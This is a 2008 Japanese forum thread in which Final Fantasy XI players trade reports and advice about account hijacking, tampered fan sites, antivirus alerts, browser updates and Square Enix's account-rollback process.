既にその名前は使われています :2008/09/21(日) 10:02:54 ID:QOwb+w9l
LS内で2名ほど、RMTサイトからフレンド登録しませんか? とのメールが来てたとの報告が。 新手のアカハックでしょか? 差出人は−−−−になってるそうです。
814 :
既にその名前は使われています :2008/09/21(日) 10:25:51 ID:QOwb+w9l
失礼しました。すでに上がってたようですね、 たぶん同じ業者からのメールですね。 ちなみに爺鯖です。
テルきたりメッセきてる=垢ハックされた!?ではない。 されてないから安心しろ。 気持ち悪いのはたしかだけど。
一人暮らしの女子大生のところに、ハァハァ(;´Д`)電話がかかってくるようなものだと 思えばいい。
817 :
既にその名前は使われています :2008/09/21(日) 12:28:22 ID:h0ZvgzpO
業者「お前のIDとパスよこせよ(;´Д`)ハァハァ」
819 :
既にその名前は使われています :2008/09/21(日) 13:07:55 ID:FZ8DTlzw
820 :
既にその名前は使われています :2008/09/21(日) 15:32:21 ID:UiWLhQw4
247 ここが賑わってないのはいいことだ
821 :
既にその名前は使われています :2008/09/21(日) 17:21:55 ID:0RFZ2r2m
あげ
822 :
既にその名前は使われています :2008/09/21(日) 19:17:02 ID:1t848tQI
254サルベんジ
823 :
既にその名前は使われています :2008/09/21(日) 19:20:58 ID:0RFZ2r2m
>>797 米ジオのアカウントでtopページなし。
yohoo.comにabuse report送っときました。
no-ip.orgはDDNSサービス
ffxiserver77.no-ip.orgはアクセスできなくなってて実際のIP不明
沈静化してるのか飛び石連休でみんなお出かけなのかw
静かなのはいいことだ ハァハァ
824 :
既にその名前は使われています :2008/09/21(日) 21:08:01 ID:WeiWpL4i
825 :
既にその名前は使われています :2008/09/21(日) 21:15:22 ID:4VWPi9V8
>>823 国内向けのハックよりもユーザーが多くリスクがより少ない北米などにターゲット変えたのではないでしょうか?
海外の攻略サイト見てる人はこれから要注意ですね。
826 :
既にその名前は使われています :2008/09/21(日) 22:09:34 ID:Pm7oIwCl
アメリカにやったら仕返し何されるかw
827 :
既にその名前は使われています :2008/09/21(日) 23:00:47 ID:WeiWpL4i
fc2アクセス解析レンタルしたまま忘れてました 今日みたらアクセス最大ページ数120ページまでなのに 1000個も知らないページが登録してありました ハックですか?
828 :
既にその名前は使われています :2008/09/21(日) 23:14:15 ID:ddgdEnw8
おやすみ前のあげ。
829 :
既にその名前は使われています :2008/09/21(日) 23:58:33 ID:VnB6isqG
age
830 :
既にその名前は使われています :2008/09/22(月) 00:39:49 ID:YWZ3zaew
>>825 米でやるほうがリスクが大きいっしょ
日本はネット関連の処罰法がまったく整ってないから、こっちのほうがやりやすいはず
831 :
既にその名前は使われています :2008/09/22(月) 00:41:10 ID:Ru8FyPGa
用語辞典くそ重い このご時世だからもう何もかもこえー
832 :
既にその名前は使われています :2008/09/22(月) 00:48:29 ID:UpKzgIhf
そういや不正アクセスがアメリカからだった場合、 日本の警察に被害届出せば、犯人逮捕される可能性ってあるんかな?
833 :
既にその名前は使われています :2008/09/22(月) 00:57:25 ID:vQ9En+cr
>>832 結果がどうあれ警察に届け出は必要でしょ。
835 :
既にその名前は使われています :2008/09/22(月) 02:27:16 ID:VGYOoWlK
215からあげ
836 :
既にその名前は使われています :2008/09/22(月) 04:34:58 ID:vQ9En+cr
203からあげ
837 :
既にその名前は使われています :2008/09/22(月) 08:59:24 ID:5eVFCYEw
age
838 :
既にその名前は使われています :2008/09/22(月) 10:46:15 ID:Nc252uVF
アメリカには日本よりスーパーハカーが居てなんとかしてくれるはず
839 :
既にその名前は使われています :2008/09/22(月) 11:53:31 ID:EYmmg+9B
普段PS2オンリーで連休で実家のPCでやってたらやられたわ・・・ セキュリティざるだったので自業自得だが 6年間積み上げてきた物が1日でボロクソにされるのはきついな・・・ とりあえず新パスにしてもらったが 支払い方法がwebマネからクレカに、全キャラ鯖移転させられてたっぽい 支払い方法は治してくれるみたいだけど、 キャラはもう巻き戻し申し込むしかないよなあ キャラ名被ってて変えなきゃいけなくなってたら鬱だ
840 :
既にその名前は使われています :2008/09/22(月) 12:14:48 ID:siUjfnpr
最近中華の爆撃をあまり見ないと思ったら、どうもアラド方面に進出しているようだ。
パクリブログもアラドブログのパクリだったりするし。
見つけた福建中華のパクリブログ
ttp://yaplog ■jp/aradsummon/
プロフィール欄下部にinfosueekの幅30、高さ0のIFRAME。
タイトルとプロフィール欄、記事本文を別々のFC2ブログにあるアラドブログからパクっている。
タイトルはタイトルを検索すれば出てくる。
記事はちょっと長いが以下を検索すると一発で出てくる。
”知能による火力を夢見て、適当にノース知能布を揃えてみました。現在の街での知力が618、ララミスが発動すると700越します。”
気をつけてくれよな!
841 :
既にその名前は使われています :2008/09/22(月) 12:52:29 ID:GVQz/btR
コマンドプロンプトに (*´Д`)ハァハァ をコピーして貼り付けてENTER。
842 :
既にその名前は使われています :2008/09/22(月) 12:56:23 ID:7WFrQLWR
w
843 :
既にその名前は使われています :2008/09/22(月) 13:21:25 ID:AqP0Ab4p
米ユーザーターゲットとかサイバー戦争勃発ですがな
JPがやられ放題で、中の国に何もしてこないって事に味締めて、 市場の大きい米をターゲットにすればもっとうまぁwって思っちゃったのね 米がどういう国か知らない連中がやってるんだろうね
845 :
既にその名前は使われています :2008/09/22(月) 15:30:03 ID:pt4h2p0f
239agu
846 :
839 :2008/09/22(月) 16:27:34 ID:Y80UH8sm
ゲームデータの復元を依頼したんだが これ結構巻き戻されるんだよな? 垢ハックされる前日にタイダルタリスマンを ゲーム内で受け取ってるんだがオワタっぽい? 5000円払って残ったのはウンコアクセサリーだけかよww
先に伝えておけばなんとかしてくれるかもしれんしGMでもよんでみたら? だめなら諦めるだけだなw
>>846 ん〜どうなんだろ。スクエニもそこまで想定していないと思うので
GMやサポセンに掛け合ってぜひ前例作ってくれ。
849 :
既にその名前は使われています :2008/09/22(月) 16:49:28 ID:VFrBHiLv
同じアカが二回やられたケースってある?
850 :
既にその名前は使われています :2008/09/22(月) 16:50:01 ID:z4afl7R9
ある
851 :
既にその名前は使われています :2008/09/22(月) 17:06:44 ID:VFrBHiLv
こわいなー
852 :
既にその名前は使われています :2008/09/22(月) 17:13:33 ID:6ri1VPRi
なんかキャラ選択画面で全画面モードを失ったとかエラーが出た。 垢ハックはPOLログインの時に落ちるんだっけ?
853 :
839 :2008/09/22(月) 17:25:57 ID:Y80UH8sm
チャットサービスで聞いて来たぜw やはり基本的にアイテム補償はやらないってことみたいだけど 一応もしインゲームアイテムなくなってたらGMに問い合わせてくれとのこと。 アイテム救済措置の方でいけるかも ついでにいつくらいのデータに巻き戻るのよ?って聞いたけど教えてくれなかった。 一応垢ハックされたのがわかった直前のデータとは言ってたけど怪しいなw
私はハック受ける一日前に巻き戻しでした。 NM倒してアイテム取ってたのに、張り込みしている時の状態だった。
855 :
839 :2008/09/22(月) 17:48:10 ID:Y80UH8sm
お、じゃあ運が良ければいけそうか? 一応送付書類にも不正アクセス受けた日時かなり正確に書いといた
元締はロシア、アメリカで労働者が中国等アジア。 ターゲットは日本、韓国、アメリカ、ドイツ。 でOK?
857 :
既にその名前は使われています :2008/09/22(月) 18:13:49 ID:VFrBHiLv
何人くらい被害が出たとか数字出てないの?
858 :
既にその名前は使われています :2008/09/22(月) 18:18:56 ID:Nc252uVF
■eしか知りえない情報だし、■eは開示する気無いからな。
859 :
既にその名前は使われています :2008/09/22(月) 19:11:49 ID:4CN1VSIy
そんな■的に不利な情報開示する訳が無い
860 :
既にその名前は使われています :2008/09/22(月) 19:45:38 ID:ek+j7OI3
DB調べなきゃわからんての
861 :
既にその名前は使われています :2008/09/22(月) 19:53:09 ID:thKm4rhT
862 :
既にその名前は使われています :2008/09/22(月) 19:54:39 ID:XYytP5i+
食品関係でもそうだけれど 中華のやる事なす事信じられない。
スレチってわかってるのに貼るバカ
売らなきゃいいだけだしな。 最初からソース公開されてるLinux+Firefoxとかいいんじゃねーの?
216age
866 :
既にその名前は使われています :2008/09/22(月) 21:06:46 ID:82t0HMa3
ってsageチェック外れてなかった
867 :
既にその名前は使われています :2008/09/22(月) 21:09:16 ID:ek+j7OI3
>>861 リンクは踏みたくないが
国内販売するIT製品のソースコード全部晒せってやつかな?
いいんでない
自国にはコピー技術しかないことが痛いほど判明するだろw
>>857 国内だけなら週間で問い合わせ人数が数百人
認定された人数はちょっと判らん。
869 :
既にその名前は使われています :2008/09/22(月) 23:17:08 ID:rDipaBrJ
250フライドチキン
870 :
既にその名前は使われています :2008/09/22(月) 23:17:48 ID:PBGJqUqz
age
871 :
既にその名前は使われています :2008/09/23(火) 00:06:37 ID:zWGEhuxf
強制終了の症状なのですが、最近 FFからログアウト→POLからメッセージ作成中 文章を打って何度かEnterキーで確定すると落ちるようになりました。 キーロガーを防止するフリーソフト、Nologgerを導入したところ その症状は治りました。 これ、やられてますかね・・・?今のところ実害はないのですが。 (POLのログインはソフトウェアキーボードを使っています。)
872 :
既にその名前は使われています :2008/09/23(火) 00:55:58 ID:F/4gSRY+
おやすみ前のあげ
873 :
既にその名前は使われています :2008/09/23(火) 00:56:12 ID:l+eha6ts
>>839 戻ってきたときに名前変わるの嫌なら、
別アカがあるならその名前を確保しとくとか、
ないなら親しいフレにメインキャラの名前だけ確保しといてもらえ。
そうすりゃ戻ってきたときに、確保しといたキャラ削除で元の名前使える。
874 :
既にその名前は使われています :2008/09/23(火) 02:10:25 ID:cfwbkyVE
ほ
し
876 :
既にその名前は使われています :2008/09/23(火) 02:36:35 ID:tDWc3YNk
の
877 :
既にその名前は使われています :2008/09/23(火) 02:37:13 ID:rWQYgeqf
わ
し
が
880 :
既にその名前は使われています :2008/09/23(火) 04:06:44 ID:+yw5idfe
そ
881 :
既にその名前は使われています :2008/09/23(火) 04:13:03 ID:qAVCpxjo
だ
882 :
既にその名前は使われています :2008/09/23(火) 04:14:18 ID:d7vKlaHg
はらへった
883 :
既にその名前は使われています :2008/09/23(火) 04:50:06 ID:tb0p3FBa
ほ
し
ゅ
886 :
既にその名前は使われています :2008/09/23(火) 07:33:08 ID:vVchXBEn
う
887 :
既にその名前は使われています :2008/09/23(火) 07:33:48 ID:duCkt7TY
ち
888 :
既にその名前は使われています :2008/09/23(火) 09:34:45 ID:XIFXo8sc
ん
889 :
既にその名前は使われています :2008/09/23(火) 09:44:05 ID:8zb2yrNw
やだ・・・何この流れ・・・
890 :
既にその名前は使われています :2008/09/23(火) 10:21:31 ID:81A7AHmG
獣使いwikiでFF11マップガイド(ネット便利)が危険って書いてあるけど、 これまだ危険なの? つい最近見ちゃったけど何とも無い Noscript入れといて良かったわ ヴァナMAPが無くなってから地図サイト困ってるんだよなぁ
891 :
既にその名前は使われています :2008/09/23(火) 10:28:15 ID:n5hvIAsJ
>>890 ネット便利さんは改ざんの直後 レンタルサーバを引っ越し済み
黒魔メモさんも改ざん部分は対応済みですから
現状どちらも大ジョブだと思いますよ。
892 :
既にその名前は使われています :2008/09/23(火) 10:29:51 ID:ovQ23Rjo
>最近見ちゃったけど何とも無い 安全・危険は業者の気分次第・管理側のセキュリティで変動するから絶対安全ってものはないし。 現在安全かどうかは知らないが、ハックするストックが多くて順番まち状態かも知れないのにこの考え方は危険じゃね。
893 :
既にその名前は使われています :2008/09/23(火) 10:30:42 ID:ovQ23Rjo
スマンうっかり行間あいてる・・・
894 :
既にその名前は使われています :2008/09/23(火) 10:53:36 ID:7JBeCaiP
>>890 Noscript入れてたならわかると思うけど
反応しなければ改竄されてないってことだべw
895 :
既にその名前は使われています :2008/09/23(火) 11:16:46 ID:81A7AHmG
おーそうか 逆に獣wikiが情報更新するの放置してるってことだなw フレの多数がネット便利使ってるはずだから心配だったが安心したぜ 皆あんがとなー
896 :
既にその名前は使われています :2008/09/23(火) 12:44:58 ID:+hEvZWa/
polhook.dllって何ですか? XPの時計つついたらカスペルが、 新規または修正モジュールがなんたらかんたらで polhook.dllの変更を許可するか?ってメッセージが出てきたんだけど・・・。
897 :
既にその名前は使われています :2008/09/23(火) 13:28:44 ID:8JJFJtK/
一回改竄されたことのあるHPだし、たとえ今安全でも今後どの瞬間に改竄されるかもわからない ってことを念頭に置いて閲覧しろよ
898 :
既にその名前は使われています :2008/09/23(火) 13:49:28 ID:+WxZZbGl
899 :
既にその名前は使われています :2008/09/23(火) 14:17:22 ID:XjdYoqJo
>>895 正直スマンカッタ
ネット便利と黒魔メモも対応済みにしました
900 :
既にその名前は使われています :2008/09/23(火) 14:29:01 ID:qKETor0V
チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?
901 :
既にその名前は使われています :2008/09/23(火) 16:12:23 ID:45YCIkJl
ほ
902 :
既にその名前は使われています :2008/09/23(火) 16:27:07 ID:MXYLWNEC
>>900 > チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?
一般企業なら10日前後と受け取っていいが
スクエニなので+一週間はみなさい
903 :
既にその名前は使われています :2008/09/23(火) 18:34:29 ID:BHpBTJFY
保守
904 :
既にその名前は使われています :2008/09/23(火) 18:44:31 ID:qKETor0V
てことは3週間か。 巻き戻しサービスあるだけましか。
905 :
既にその名前は使われています :2008/09/23(火) 19:06:04 ID:xQxmE3KC
あ
906 :
既にその名前は使われています :2008/09/23(火) 19:08:09 ID:bCHS+vQc
今までの話からすると、1〜2週間も巻き戻ってるほうがまれ オレの場合数時間前だった
907 :
既にその名前は使われています :2008/09/23(火) 19:09:00 ID:bCHS+vQc
ああ、巻き戻しにかかる期間か 忘れてくれ orz
最近はだいぶ落ち着いてきたのかね? 一時期定時集合系コンテンツ行く度に誰かが引っかかってたが最近は聞かなくなった
909 :
既にその名前は使われています :2008/09/23(火) 21:33:20 ID:3ppZqjM5
ヤフオクの垢つー金蔓に注力し始めたんじゃないのか
910 :
既にその名前は使われています :2008/09/23(火) 22:19:01 ID:YY+cip2S
一瞬の油断が命取り
911 :
既にその名前は使われています :2008/09/23(火) 23:59:39 ID:VzURTp+m
ほす
912 :
既にその名前は使われています :2008/09/24(水) 00:52:00 ID:Ek2YrNmf
FF11WARNING管理人です。連絡と提案です。 topページだけ見て帰ったようですが9/21の生ログでmiku.xrea.jp/template/に proxy1.square-enix.co.jp からのアクセスがありました。 リファラがime.nuで、つまりこのスレからとんできてました! 個人としてか組織としてかはわかりませんが 少なくともスクエニ社内からこのスレをチェックしているようです。 (imenu経由のスクエニのアクセスログは初めてみましたw) 当方はスレを参考にさせていただいていますし 情報収集もさせていただいていますが スレの内容であっても当方で扱わない話題も多々ありますしスレ維持に携わっているわけでもありません。 このまま状況が落ち着くようであれば、 以前にも話題になっていた「スレのまとめサイト」を作ることを提案します。 スレの性質上管理運用の問題がどうしても避けて通れない問題ですので 必要であれば出すぎたことではありますが軌道に乗るまでの管理運営は当方で行ってもかまいません。 その辺のご検討ご意見をいただければと思います。 スレにはお世話になってるのでコピペでも情報を蓄積できればいいなぁ、なんて考えたわけです。 まとめなんて必要ないぜ(*´Д`*)ハァハァであればスルーしといてください。私も忘れますw 書き逃げになりますが寝ます。おやすみなさい。
結構前のことかもしれないが、業者のサイト潰したスーパーハカーいなかったっけ? あんな人に活躍して欲しいな・・・。
914 :
既にその名前は使われています :2008/09/24(水) 02:15:35 ID:Mvuti9AG
>>912 まとめサイトのご提案、否はありません
このスレとしてもFF11WARNINGさんへの誘導を多々行っていますので
作っていただければ嬉しい限りだと思います
ただ、ジオであれば安全であるとは申せませんが、できればミラーの
ほうにも載せていただけると嬉しいです
別事案の垢ハック事案でもジャンプ元がここで 足跡残しまくりだから ■は昔から体質は変わっていない
916 :
既にその名前は使われています :2008/09/24(水) 04:15:34 ID:Mvuti9AG
216からシュシュ
917 :
既にその名前は使われています :2008/09/24(水) 05:57:11 ID:yhhAA3vm
お早うのシュシュ
918 :
既にその名前は使われています :2008/09/24(水) 07:13:23 ID:dCT6ndf1
本気age
919 :
既にその名前は使われています :2008/09/24(水) 08:27:14 ID:0OycixaT
>>912 結局プレミアサイトなんて必要はなかったんだよな。
920 :
既にその名前は使われています :2008/09/24(水) 10:22:32 ID:VP1b5tV+
Firefox3.0.2揚げ
921 :
既にその名前は使われています :2008/09/24(水) 12:27:52 ID:LUwLcWdK
RMT関係を本気でアカバンすると 売り手と買い手で相当数が解約になって ゲームなりたたなくなるんじゃね?w それが怖くて■の対応鈍いんじゃないかと勝手に想像
922 :
既にその名前は使われています :2008/09/24(水) 12:38:21 ID:hbj5mEPU
よくも悪くもRMTあるから続けてるってのもあるね 売って引退できなきゃとっくに辞めてるかな
923 :
既にその名前は使われています :2008/09/24(水) 12:44:59 ID:AIJeKsqx
初期組からしてみりゃRMTなんて要らん。いわゆる『必要悪』なんかでない。必要ない悪なんだ。 RMTのない頃は、皆それなりに目的持ってコツコツ金貯めてた。 それをRMTと業者が超インフレ引き起こして、頑張ってもどうにもならない世界にしたんだ RMTないと続けていけない奴は業者と一緒に辞めればいい
924 :
既にその名前は使われています :2008/09/24(水) 12:49:15 ID:V1dMZG+a
金策潰されたのは業者が24時間稼動で素材乱獲・釣り上げ・NM独占したからだしな。 そしてRMTerにギル売って、その利益で垢ハック開発。 もちろん、垢ハックは業者のお客様であるRMTerも対象外ではございません。
925 :
既にその名前は使われています :2008/09/24(水) 13:20:34 ID:02TC7Zxv
>>922 なら、結局時給いくらでFF11何年やってたか計算してみ?w
926 :
既にその名前は使われています :2008/09/24(水) 13:31:47 ID:15q2Gggd
今は垢で検索するとタル♀スレも引っ掛かるんだよなぁ
927 :
既にその名前は使われています :2008/09/24(水) 13:33:59 ID:kR1AEZV1
タル♀NGスレッドにいれろw
今の給料のまま中国行ったら、田舎じゃ豪邸に住めるよ
>>923-924 でもちゃんと運営がそれに対応していけていれば
インフレ等起こさずに済んだんだよね
■の対応の悪さも大きな要因だと思うよ
930 :
既にその名前は使われています :2008/09/24(水) 14:50:15 ID:duSqV/c/
212からあげ
931 :
既にその名前は使われています :2008/09/24(水) 14:56:10 ID:79mS7vzp
ここ2日くらい決まった時間に、PG2が何かをブロックしてる。 先々週も似たようなことあってスキャンしたんだけど、何も出てこないし、被害もなし。 ソフトのアップデート先がブロック対象国だったりするから、それなのかなあ。 こういう被害が増えてくると、安全かどうか見極めがつかなくておっかないね。
932 :
既にその名前は使われています :2008/09/24(水) 15:02:32 ID:qhNFcDY4
>>931 IPからある程度調べられるから、確認してから許可汁
AH久しぶりに覗いたらすげぇ勢いで香港IPはじきまくってたから注意してくれよな
934 :
既にその名前は使われています :2008/09/24(水) 16:00:28 ID:eVaAL+9s
みるなよw
935 :
既にその名前は使われています :2008/09/24(水) 16:04:31 ID:79mS7vzp
>>932 先々週のも今回のも、IP調べたら大学と出ました。
踏み台にされてて元が業者だろうからやられたなと思ったんだけど、3種類のソフトでスキャン
したんだけど、何も出てきてません。
今のところ被害がないので、余計に怖いです。
936 :
既にその名前は使われています :2008/09/24(水) 16:47:27 ID:hbj5mEPU
937 :
既にその名前は使われています :2008/09/24(水) 16:58:40 ID:cCOs+p+4
938 :
既にその名前は使われています :2008/09/24(水) 16:59:26 ID:cCOs+p+4
>また、Firefox 2についても、脆弱性などを修正した「Firefox 2.0.0.17」をリリースした。Firefox 2.0.0.17では、Firefox 3.0.2と同様の脆弱性を含む合計9件の脆弱性を修正している。
まだFx2出すのか…もう切れよ
940 :
既にその名前は使われています :2008/09/24(水) 17:45:38 ID:jYhseEZg
あと3ヶ月の命なんだから勘弁したれ
941 :
既にその名前は使われています :2008/09/24(水) 19:01:32 ID:jYhseEZg
213
942 :
既にその名前は使われています :2008/09/24(水) 20:30:51 ID:dkukcpch
POLシャットダウン時にエラー マシンシャットダウン時に時間がかかる この2つの現象が起きたのでカスペでスキャンしたが何も検出されず 心あたりは昨日間違えて白地図本舗開いたくらい ブサウザはオペラでP2Gが何かブロックしてる形跡は今のところ無し これはまずいでしょうか?
943 :
既にその名前は使われています :2008/09/24(水) 20:34:59 ID:CCb6+GH6
hostsファイルを一週間に一度手動で更新してるんだけど、 Spybot-S&Dのhosts更新と合わせると凄まじい行数になるね 個人的にJ-word関連も登録してるけど
944 :
既にその名前は使われています :2008/09/24(水) 20:35:23 ID:hbj5mEPU
後悔する前にパス変えて レジストリ見といたほうがいいんでない
945 :
既にその名前は使われています :2008/09/24(水) 20:47:13 ID:dkukcpch
wなんとかの方はレジストリ検索しても無かったです 他のはまだ見ていないので帰宅したら試してみます
946 :
既にその名前は使われています :2008/09/24(水) 21:33:47 ID:qhNFcDY4
>>942 POLのほうは怪しいけど、PG2使ってるとWINDOWSのシャットダウンが遅くなることがある
一度PG2を手動で終了させてからシャットダウンしてみ
947 :
既にその名前は使われています :2008/09/24(水) 22:27:16 ID:viNTHcJr
Firefox 3.0.2 age
948 :
942 :2008/09/24(水) 23:29:15 ID:Tw1OQ2Nz
>>944 >>946 ありがとうございます
帰宅したので3種ともレジストリ検索しましたが見つからず
パスワードを変えて動向を伺う事にします
949 :
既にその名前は使われています :2008/09/24(水) 23:47:56 ID:qhNFcDY4
200↑
950 :
既にその名前は使われています :2008/09/25(木) 00:07:57 ID:OL3NEHb7
おやすみ前のあげ。
951 :
既にその名前は使われています :2008/09/25(木) 01:47:49 ID:sayLKFZE
952 :
既にその名前は使われています :2008/09/25(木) 01:58:08 ID:04jl2VNQ
先日アカハックされたんだが、LSコミュからパス抜かれたりするの? 全くの素人でどこでやられたか検討が…
953 :
既にその名前は使われています :2008/09/25(木) 02:19:07 ID:IflnUyKr
キミはLSコミュにどうやってログインするんだい?
954 :
既にその名前は使われています :2008/09/25(木) 02:21:07 ID:IflnUyKr
つか最近はやったのはどこでやられたのかわからない系だから
キミみたいなのがハックされてもなんの不思議も無い
とりあえず
>>1 見てテンプレで報告してくれたらありがたい
955 :
既にその名前は使われています :2008/09/25(木) 02:21:35 ID:ibBNqA1U
956 :
既にその名前は使われています :2008/09/25(木) 03:00:06 ID:iT1BwDEC
ウイルスセキュリティゼロでスキャンかけたらTrojan.Win32.Agent.DOXNとかいうのがでてきた。 ぐぐっても一致する情報がでないし、これなんぞ・・・
958 :
既にその名前は使われています :2008/09/25(木) 03:17:38 ID:iT1BwDEC
>>957 ありがとう、まだスキャン中なので終わったらそちらでもやってみる。
959 :
既にその名前は使われています :2008/09/25(木) 03:23:32 ID:yrLjKRZH
まあ、カペルは正規プログラムでもブロック(マイクロソフトの正規プログラムでもウイルス判定だしたw)するからなー 複数のオンラインスキャンもして、何もなかったら取り敢えず大丈夫?かなって程度。
960 :
既にその名前は使われています :2008/09/25(木) 03:54:41 ID:iT1BwDEC
スキャン完了、ニフティでは何も検出されず。(ゼロで駆除した後だからでてきても困るが) 今日はもう遅いので明日カスペでもかけてみよう・・・
961 :
既にその名前は使われています :2008/09/25(木) 04:47:40 ID:F5E1o360
ウィルス(に対しての)セキュリティ(が)ゼロ
962 :
既にその名前は使われています :2008/09/25(木) 09:15:40 ID:JSnoXGg0
本気でウィルスセキュリティ0つかってるやついたのかw マジで安かろう悪かろうを地でいくソフトだぞw
963 :
既にその名前は使われています :2008/09/25(木) 11:02:14 ID:1Ic6ACnb
あぐ
964 :
既にその名前は使われています :2008/09/25(木) 11:18:16 ID:7P/6hAsc
カスペ2009の無償バージョンアップのお知らせが来たわけだが 今安定して動いてるものにいれるのはちょっと躊躇するなぁ。
965 :
既にその名前は使われています :2008/09/25(木) 11:42:22 ID:yrLjKRZH
ゼロはなー。 悪いって訳じゃないけど、 「ゆっくりしていってね!」系の週一でネットに繋げる人用のウイルスソフトだからなー(と、俺の中での位置付け) ネトゲするような人には向いてないよなー。あのソフト。
966 :
既にその名前は使われています :2008/09/25(木) 12:27:28 ID:sayLKFZE
>>964 3ヶ月から半年ぐらいしてソフトがこなれてからの方がいいと思う。
別にすぐバージョンアップしないとパターンファイルやらが更新されないって言う事が無い限りには
967 :
既にその名前は使われています :2008/09/25(木) 14:40:16 ID:9wrHarCg
今日ノートンでTrojan.ByteVerifyってのが引っかかりました 駆除してパス変えたけどこれが垢ハックのウイルスかも
968 :
既にその名前は使われています :2008/09/25(木) 14:51:30 ID:AlVb+AUx
MS03-011の虚弱性って何年前のウイルスですかw
969 :
既にその名前は使われています :2008/09/25(木) 14:56:02 ID:GCfQ6hR2
970 :
既にその名前は使われています :2008/09/25(木) 15:01:18 ID:3+zTmnxM
971 :
既にその名前は使われています :2008/09/25(木) 15:04:27 ID:GCfQ6hR2
>>970 いえ、そういうつもりで出したわけではありません
駆除方法がけっこうやっかいなので、このページは見たのかな?と
思って出しただけです
>>968 つられてやるクマー
× 虚弱性(きょじゃくせい)
○ 脆弱性(ぜいじゃくせい)
973 :
既にその名前は使われています :2008/09/25(木) 16:50:29 ID:gm2XoDPh
虚弱性wwwwwwww これはひどいwwwww
974 :
既にその名前は使われています :2008/09/25(木) 18:02:26 ID:DQ/51Pn6
Vana'diel Wiki World Map Guide //ffxi.logue.be/ aguseで確認したらURLは存在しないと出たのですがページは存在してます。 お気に入り整理でうっかり踏んじゃったのですがここって大丈夫でしょうか? テンプレの鑑定スレは数日レスがついてないし、既に巻き戻し使っちゃってるので次がないため 不安なのでスレチ承知で伺いに来ました。 ブラウザはfirefox3.0+NoScriptです。
975 :
既にその名前は使われています :2008/09/25(木) 19:03:40 ID:1Ic6ACnb
>>974 携帯からなので簡略に。ほぼ同じ環境で18時50分ごろ踏んだ限りは無問題だった
どの瞬間に改竄されるか分からないから974が大丈夫とまでは言い切れないけどね。
あと火狐は3.0.2にしておきなよ。
ってかいつのまにかほぼ全鯖で規制食らってて俺の怒りが有頂天
976 :
既にその名前は使われています :2008/09/25(木) 19:17:57 ID:DQ/51Pn6
>>975 さん
ありがとー!
ノートン、ニフティ、カスペで何も出なかったので大丈夫かなとは思ったのですが
本当に不安で仕方なかったのです、大分安心しました。
私も規制食らってるらしく携帯からでした。
本当にありがとう、火狐は早速3.0.2にいたします。
977 :
既にその名前は使われています :2008/09/25(木) 19:22:11 ID:cBmZZ5+P
カスペが8.0になってファイアウォール設定がかなりわかりにくくなったな
それほどでもない
979 :
既にその名前は使われています :2008/09/25(木) 20:40:40 ID:IVh6iRoV
カスペ2009にしたら、POL.exeがキーロガー反応しまくりだ どうしたものか
980 :
既にその名前は使われています :2008/09/25(木) 20:44:32 ID:cBmZZ5+P
ステータスの項目から除外でOK
981 :
既にその名前は使われています :2008/09/25(木) 20:52:18 ID:IVh6iRoV
ただの誤検出なのかなあ スキャンしても問題なかったけども
982 :
既にその名前は使われています :2008/09/25(木) 21:32:52 ID:MFgTlGJp
age-ume
983 :
既にその名前は使われています :2008/09/25(木) 21:35:58 ID:YFwcpSCb
後検出っていうか設定ガチガチにしすぎるとネットに送受信するだけで感知されるぞカスペ
985 :
既にその名前は使われています :2008/09/25(木) 22:11:13 ID:PbwGcKWu
有料αのカスペ8にした奴がいるとは・・・ 流石に乙としか言いようがないですが何故もう少し待てんのだ
986 :
839 :2008/09/25(木) 22:21:39 ID:y4lJHErx
>>984 不正アクセスのことがほとんどだな
やっぱ急増してるのか
自衛汁ばっかりでもうちょい具体的な対策立てられんのかね
2度喰らったら実質引退コースだし
そもそも■eは警察に被害届とか出してんの?
法的に抑止力行使しないと絶対減らないだろ
987 :
既にその名前は使われています :2008/09/25(木) 22:22:48 ID:y4lJHErx
名前残ってたw データ復元早くやってくれww
988 :
既にその名前は使われています :2008/09/25(木) 22:26:16 ID:GCfQ6hR2
989 :
既にその名前は使われています :2008/09/25(木) 22:27:43 ID:PbwGcKWu
>>986 有料で対応してもいいかもな。
だが一人数万円の費用になると思うけどどうだろか?
警察への被害届は毎回出しているみたいだよ
現行の法ではどうにもならんってことらしいけど、抑止効果が出てきたら抑止が効かな方向に逃げるだけだから
長期的に見ると意味ないんだよね。どんな犯罪でも同じだけどね。
まずやるべきは犯罪が起きてからの対応じゃなくてスクエニ側の犯罪が起きにくくする対策なんだろうけど、一番効果があるのが競売。競売停止したらゲーム変わってしまうだろうか?
990 :
既にその名前は使われています :2008/09/25(木) 22:30:07 ID:GCfQ6hR2
>>986 法的抑止力になりえるものが存在しないから問題なのです
せいぜいできることは、国内の中継ポイントを潰すことくらいです
991 :
既にその名前は使われています :
2008/09/25(木) 22:34:09 ID:UJ4aIONQ ウィルスセキュリティーゼロで、ハック前後検疫したけど、反応なし。。。